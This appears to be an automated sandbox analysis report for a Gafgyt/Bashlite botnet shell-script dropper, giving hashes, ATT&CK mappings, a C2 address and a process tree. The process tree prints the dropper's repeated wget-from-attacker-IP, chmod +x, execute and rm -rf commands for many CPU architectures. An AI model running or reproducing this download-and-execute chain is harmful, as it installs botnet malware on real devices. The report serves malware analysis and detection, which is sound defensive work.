gafgyt | d3102a23a69dcc14e275b16b133137d42979f840851e22c2688420d0dfbb0f8e

Analysis

max time kernel
149s
max time network
153s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
08-12-2024 02:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d3102a23a69dcc14e275b16b133137d42979f840851e22c2688420d0dfbb0f8e.sh
Size

2KB
MD5

0f886518495ede0d60cb0be5653a4907
SHA1

8adeb236ab6d2503646382bfbbfc9d24aea427c2
SHA256

d3102a23a69dcc14e275b16b133137d42979f840851e22c2688420d0dfbb0f8e
SHA512

61c8ccce22606ef885b6d79c9093b9fbdc977a9ab39d80715117b21d0251b6134c69682bee3ae667884e6ad3d85f9ef9ec75fb101c59e30cb02b73ab0fc0df7a

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

93.123.85.191:12345

Signatures

Detected Gafgyt variant 11 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt
behavioral1/files/fstream-2.dat	family_gafgyt
behavioral1/files/fstream-3.dat	family_gafgyt
behavioral1/files/fstream-4.dat	family_gafgyt
behavioral1/files/fstream-5.dat	family_gafgyt
behavioral1/files/fstream-6.dat	family_gafgyt
behavioral1/files/fstream-7.dat	family_gafgyt
behavioral1/files/fstream-8.dat	family_gafgyt
behavioral1/files/fstream-9.dat	family_gafgyt
behavioral1/files/fstream-10.dat	family_gafgyt
behavioral1/files/fstream-13.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1519	chmod
1530	chmod
1536	chmod
1546	chmod
1551	chmod
1566	chmod
1503	chmod
1508	chmod
1541	chmod
1556	chmod
1561	chmod
1513	chmod
1525	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/m-i.p-s.Sakura	1504	m-i.p-s.Sakura
/tmp/m-p.s-l.Sakura	1509	m-p.s-l.Sakura
/tmp/s-h.4-.Sakura	1514	s-h.4-.Sakura
/tmp/x-8.6-.Sakura	1520	x-8.6-.Sakura
/tmp/a-r.m-6.Sakura	1526	a-r.m-6.Sakura
/tmp/x-3.2-.Sakura	1531	x-3.2-.Sakura
/tmp/a-r.m-7.Sakura	1537	a-r.m-7.Sakura
/tmp/p-p.c-.Sakura	1542	p-p.c-.Sakura
/tmp/i-5.8-6.Sakura	1547	i-5.8-6.Sakura
/tmp/m-6.8-k.Sakura	1552	m-6.8-k.Sakura
/tmp/p-p.c-.Sakura	1557	p-p.c-.Sakura
/tmp/a-r.m-4.Sakura	1562	a-r.m-4.Sakura
/tmp/a-r.m-5.Sakura	1567	a-r.m-5.Sakura

Reads system routing table 1 TTPs 2 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	x-8.6-.Sakura
File opened for reading	/proc/net/route	x-3.2-.Sakura

Reads system network configuration 1 TTPs 2 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	x-8.6-.Sakura
File opened for reading	/proc/net/route	x-3.2-.Sakura

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/s-h.4-.Sakura	wget
File opened for modification	/tmp/a-r.m-6.Sakura	wget
File opened for modification	/tmp/i-5.8-6.Sakura	wget
File opened for modification	/tmp/m-6.8-k.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/a-r.m-4.Sakura	wget
File opened for modification	/tmp/a-r.m-5.Sakura	wget
File opened for modification	/tmp/m-p.s-l.Sakura	wget
File opened for modification	/tmp/x-8.6-.Sakura	wget
File opened for modification	/tmp/x-3.2-.Sakura	wget
File opened for modification	/tmp/a-r.m-7.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/m-i.p-s.Sakura	wget

/tmp/d3102a23a69dcc14e275b16b133137d42979f840851e22c2688420d0dfbb0f8e.sh
/tmp/d3102a23a69dcc14e275b16b133137d42979f840851e22c2688420d0dfbb0f8e.sh
1⤵
PID:1497
- /usr/bin/wget
  wget http://93.123.85.191/m-i.p-s.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1498
- /bin/chmod
  chmod +x m-i.p-s.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1503
- /tmp/m-i.p-s.Sakura
  ./m-i.p-s.Sakura
  2⤵
  - Executes dropped EXE
  PID:1504
- /bin/rm
  rm -rf m-i.p-s.Sakura
  2⤵
  PID:1506
- /usr/bin/wget
  wget http://93.123.85.191/m-p.s-l.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1507
- /bin/chmod
  chmod +x m-p.s-l.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1508
- /tmp/m-p.s-l.Sakura
  ./m-p.s-l.Sakura
  2⤵
  - Executes dropped EXE
  PID:1509
- /bin/rm
  rm -rf m-p.s-l.Sakura
  2⤵
  PID:1511
- /usr/bin/wget
  wget http://93.123.85.191/s-h.4-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1512
- /bin/chmod
  chmod +x s-h.4-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1513
- /tmp/s-h.4-.Sakura
  ./s-h.4-.Sakura
  2⤵
  - Executes dropped EXE
  PID:1514
- /bin/rm
  rm -rf s-h.4-.Sakura
  2⤵
  PID:1516
- /usr/bin/wget
  wget http://93.123.85.191/x-8.6-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1517
- /bin/chmod
  chmod +x x-8.6-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /tmp/x-8.6-.Sakura
  ./x-8.6-.Sakura
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:1520
- /bin/rm
  rm -rf x-8.6-.Sakura
  2⤵
  PID:1523
- /usr/bin/wget
  wget http://93.123.85.191/a-r.m-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/chmod
  chmod +x a-r.m-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/a-r.m-6.Sakura
  ./a-r.m-6.Sakura
  2⤵
  - Executes dropped EXE
  PID:1526
- /bin/rm
  rm -rf a-r.m-6.Sakura
  2⤵
  PID:1528
- /usr/bin/wget
  wget http://93.123.85.191/x-3.2-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/chmod
  chmod +x x-3.2-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1530
- /tmp/x-3.2-.Sakura
  ./x-3.2-.Sakura
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:1531
- /bin/rm
  rm -rf x-3.2-.Sakura
  2⤵
  PID:1534
- /usr/bin/wget
  wget http://93.123.85.191/a-r.m-7.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1535
- /bin/chmod
  chmod +x a-r.m-7.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1536
- /tmp/a-r.m-7.Sakura
  ./a-r.m-7.Sakura
  2⤵
  - Executes dropped EXE
  PID:1537
- /bin/rm
  rm -rf a-r.m-7.Sakura
  2⤵
  PID:1539
- /usr/bin/wget
  wget http://93.123.85.191/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1540
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1541
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  - Executes dropped EXE
  PID:1542
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:1544
- /usr/bin/wget
  wget http://93.123.85.191/i-5.8-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1545
- /bin/chmod
  chmod +x i-5.8-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1546
- /tmp/i-5.8-6.Sakura
  ./i-5.8-6.Sakura
  2⤵
  - Executes dropped EXE
  PID:1547
- /bin/rm
  rm -rf i-5.8-6.Sakura
  2⤵
  PID:1549
- /usr/bin/wget
  wget http://93.123.85.191/m-6.8-k.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1550
- /bin/chmod
  chmod +x m-6.8-k.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1551
- /tmp/m-6.8-k.Sakura
  ./m-6.8-k.Sakura
  2⤵
  - Executes dropped EXE
  PID:1552
- /bin/rm
  rm -rf m-6.8-k.Sakura
  2⤵
  PID:1554
- /usr/bin/wget
  wget http://93.123.85.191/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1555
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1556
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  - Executes dropped EXE
  PID:1557
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:1559
- /usr/bin/wget
  wget http://93.123.85.191/a-r.m-4.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1560
- /bin/chmod
  chmod +x a-r.m-4.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1561
- /tmp/a-r.m-4.Sakura
  ./a-r.m-4.Sakura
  2⤵
  - Executes dropped EXE
  PID:1562
- /bin/rm
  rm -rf a-r.m-4.Sakura
  2⤵
  PID:1564
- /usr/bin/wget
  wget http://93.123.85.191/a-r.m-5.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1565
- /bin/chmod
  chmod +x a-r.m-5.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1566
- /tmp/a-r.m-5.Sakura
  ./a-r.m-5.Sakura
  2⤵
  - Executes dropped EXE
  PID:1567
- /bin/rm
  rm -rf a-r.m-5.Sakura
  2⤵
  PID:1569

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-r.m-5.Sakura

Filesize
98KB

MD5
78105878c2bcacf9fd13adec1e5c4375

SHA1
2f7195f3435cf620f37c780368b12fe1e2c2013d

SHA256
e8bebdf7b8dc2de8e75d5eefe79ad542c844489a66e55aea6245b8dad826a4ba

SHA512
945a77dc48274a28d4c0e09fae55378fb314cbee51aa58f4cb272f35bf652f351de5a99dea80f03da7621a525143eead2161952e29aa8120514e5a5b73de3607

Download Submit
/tmp/a-r.m-6.Sakura

Filesize
118KB

MD5
36d9d44c7ecaeb7e77036c51e0cfdbf8

SHA1
f674eee0a858e3cc9ac600ffc4ad3e1c4184e118

SHA256
6ef8713da51fd3de5482c0673552e46f2d9e549c74f84b505c64233c1479b2c1

SHA512
bb01280142253e1cd4ab42ddf025afd7e943c3f52e1459858fa52d42e162161678051bc4531651a24f79093883832cfe01ecd649428fa68e135d0134037339cd

Download Submit
/tmp/a-r.m-7.Sakura

Filesize
91KB

MD5
d6e78a0f9096041b249a0ab4e25f3a42

SHA1
da7c1135e9f2cf3ebdc29ac9ac33ddcc3466b5a8

SHA256
8939e436cdfe572933bb0811338d11f9198310f38f87de0b861834a09c7532e4

SHA512
6fe21f80990a7b3113e478178267310af59b1ac19197744e6334d7183b67e3f0e3b2f193a0752565100e7c82ac42f451f433e2d6d7a13d0683d2600e79516f91

Download Submit
/tmp/i-5.8-6.Sakura

Filesize
96KB

MD5
bc3ce84023fdea9b5d6a77e6a3b2373f

SHA1
e30835b09c049335d8505c25125873935e93609d

SHA256
1feb67cfcebba27dfb86050a08bb78902e243f52fc6fbaab6d616116a8eb3da8

SHA512
1e67d12d4b0c8e362578ecd5831e40f26e9023c17c9984889ad3163cebc5cebcff53bab8284595e0f25bd7dbb4e99374e0a285201a415740c597a5c3c25ba18d

Download Submit
/tmp/m-6.8-k.Sakura

Filesize
156KB

MD5
acbdaeca418db3ef76291c6ba0284423

SHA1
e967ad94da3fd5d894ebd814e120b25abda52d2a

SHA256
a864ac4a6cd9995145a0cefd208a5fd607d5b2f28455ced9f654ddd38b378872

SHA512
0cd32ee9bcdf17270aa0b7865422953afde8830ca74a324dc48625d893f045d7bb7cc3a40bd774a2075fc93622c14fdbacfb220f96709a5f67260c20f6dd7b2a

Download Submit
/tmp/m-i.p-s.Sakura

Filesize
123KB

MD5
fa9295407e26aded7c4dbcf2423beeb2

SHA1
17ca7ee89d3574fb2d0c03ac96a6d843f6ff06f8

SHA256
c38c0746ea7ced97718d7805a8735a63c6509751e0197206990f77ac37ed8013

SHA512
b07d93d1322a1a34de1b41133782e9454300c203a0981d76ca9d9f837466943945dcee34f8e22f55071b1b62bf9929b79f473fc3b71986ec46a0e316b2144bc8

Download Submit
/tmp/m-p.s-l.Sakura

Filesize
123KB

MD5
2f1791c71eb8814dfc8c24bbba5dd0ed

SHA1
133b6be98bfe71843f80a4ec89e81ad575c62a14

SHA256
c3a6894da6ba15938339e2aa53ff106411bc8e0991700b962405f1ab6e6e9926

SHA512
37b0a7862e24ef560584a4bcc7591f700f86942fc8e9b1818754da0842d759cc380427a612daa64d3ce81ec565db628a610c08767d59fb93c2792e958e6970e8

Download Submit
/tmp/p-p.c-.Sakura

Filesize
105KB

MD5
6e80a5217c6d2bd6f076ebdb32a420f0

SHA1
a6051d8000358438bedddf94d83a64fe8f215ced

SHA256
517e5f65c8af8123d0939b560074c9cf735829d5b141f8764b4f982bc6aa3f62

SHA512
57dae19994814e98a3aa5385152fcf41390b334bea56fa8c56baf5273aa97f5153e08038dd59b3f9542fc883e730dd6a35b8a2a1b2a82ea523a85096bdd5cc04

Download Submit
/tmp/s-h.4-.Sakura

Filesize
86KB

MD5
b20e3e2f5aa792631e80a19eaf3021dc

SHA1
7326d70cf598d81335aeb70999ee09991e2146bf

SHA256
0e4045737c20d638ccc3c349572f35145fc42e6abd034d05d69901c12ec23040

SHA512
55f63d89a72082378728f83d349d4988f1440c5ad14669de50cad8433fd1a15e6cd786beeef27431828897ed9cbf5c79110746d2c6b7ac465773dea6eee85165

Download Submit
/tmp/x-3.2-.Sakura

Filesize
83KB

MD5
ce84b3d3542d8529d4e2e93b9b8ff4ef

SHA1
ae7df4142468b242959b8597df9ae038c93ccc73

SHA256
549c7160c4f216a39a1c196bb81608ff3660db25567a9812d1c3fbb32e9b71fb

SHA512
59b7d4870ccb04b5b5c00dcb2b70fb77cdcf91a0fb5bfe4265a3c64446a17352b837b05df8d5d33618f36dd42a5be9864eb713a9ae38fc8f291af11025a6b3b7

Download Submit
/tmp/x-8.6-.Sakura

Filesize
92KB

MD5
2e2b3b9e8d4e5938c625ff7db1858911

SHA1
aa95bb9c29a63ea6b602384f025ad83c7442ce80

SHA256
6e4276c87e308b06f616e3af1982df748411e022eef2b42db9017411561cbf43

SHA512
10316b7ac1e3756957bcdee92ed26a2b59ae3af352e10cac8675a8f8efce7d450929ccbee9514b34bcc880289423d8586a0601748edfcf516ab5bc133e5ec10c

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads